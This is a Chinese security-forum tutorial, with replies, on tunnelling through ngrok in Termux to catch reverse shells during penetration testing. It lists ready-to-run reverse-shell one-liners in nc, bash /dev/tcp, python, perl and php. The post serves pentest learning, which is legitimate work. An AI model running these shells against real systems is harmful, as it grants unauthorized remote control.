用户
搜索
  • TA的每日心情
    开心
    2019-10-9 01:07
  • 签到天数: 19 天

    连续签到: 1 天

    [LV.4]经常看看II

    版主

    Rank: 7Rank: 7Rank: 7

    6

    主题

    76

    帖子

    406

    魔法币
    收听
    0
    粉丝
    2
    注册时间
    2016-10-9

    i春秋签约作者

    发表于 2019-7-27 17:31:09 43590
    本帖最后由 Mstery夕颜 于 2019-7-27 17:31 编辑

    在进行渗透测试需要反弹shell的时候有一个外网的设备尤为重要,而目前,大部分运营商基本都不会伟用户分配外网IP。虽然,外网的设备可以通过购买vps来获得,但是作为一个吃饭都成问题的穷学生,是不会把钱浪费在购买vps上的,那么我们又不想出买vps的钱,又想获得一个在外网的设备应该怎么办呢?

    0x00 前言

    出门在外使用Termux来进行渗透的时候,你有没有因为需要反弹shell但安卓设备并没有外网ip而感到烦恼呢?
    虽然需要外网设备可以通过购买vps来获得,但是并不会怎么使用,身为一个穷学生的我,钱包并不支持每个月多出的这些花销。
    于是,我选择在termux上通过内网映射,配合nc反弹shell。

    0x01 内网映射

    目前主流的内网映射方法,大概就几种

    Ngrok
    FRP
    内网映射平台(如:花生壳,网络通)

    而我们这次使用的Termux为阉割版linux,花生壳之类的平台并不支持,所以我们选择使用Ngrok
    在这里我给大家推荐两个我认为比较好用的Ngrok平台

    NATAPP
    Sunny-Ngrok

    这两个平台都有免费套餐,并且延迟不会很高

    0x02 ngrok安装使用

    此处以Sunny-Ngrok为例
    登录上号之后创建一个隧道协议选TCP,其他的视自己情况设置,如下图:


    创建好隧道之后,在隧道管理处,记住自己的隧道ID,并下载Ngrok客户端,以后就可以不用上来设置了。
    下载ngrok客户端的命令为(此处为python版):

    wget http://hls.ctopus.com/sunny/python-ngrok.zip && unzip python-ngrok.zip

    解压完成后使用   python sunny.py或python2 sunny.py 运行,并输入记下的隧道id即可,连接成功如下图所示:

    NC监听6666端口:

    目标执行反弹shell:

    成功反弹:

    0x03 常用反弹shell方法

    直接使用nc反弹shell

    nc 127.0.0.1 6666 -e /bin/bash 

    通过bash反弹shell
    /bin/bash -i > /dev/tcp/127.0.0.1/6666 0<&1 2>&1

    通过python反弹shell

    python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

    通过perl反弹shell

    perl -e 'use Socket;$i="127.0.0.1";$p=6666;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

    通过php反弹shell

    php -r '$sock=fsockopen("127.0.0.1",6666);exec("/bin/sh -i <&3 >&3 2>&3");'

    0x04 结束

    写这个文章只是为了帮跟我一样的穷学生,以及一些萌新,使用各位大佬看见了,麻烦不要锤我。
    另外  Termux赛高!!!

    发表于 2019-7-27 22:56:33
    谢谢分享。。。。
    有一天他会突然觉得累了甚至忘了初衷 放弃了梦想也许因为年纪的关系奔波于现实 然后拉黑了网络认识的所有人或者说不用了一个号码换了一个QQ 那么记得他叫大叔 这个网络他曾来过
    使用道具 举报 回复
    膜拜一下夕颜大神
    使用道具 举报 回复
    发表于 2019-8-16 11:38:28

    别别别,表哥千万别这样
    使用道具 举报 回复
    发表于 2019-8-18 21:35:48
    Mstery夕颜 发表于 2019-8-16 11:38
    别别别,表哥千万别这样

    emmm
    夕颜大神客气啦  大家一起加油
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册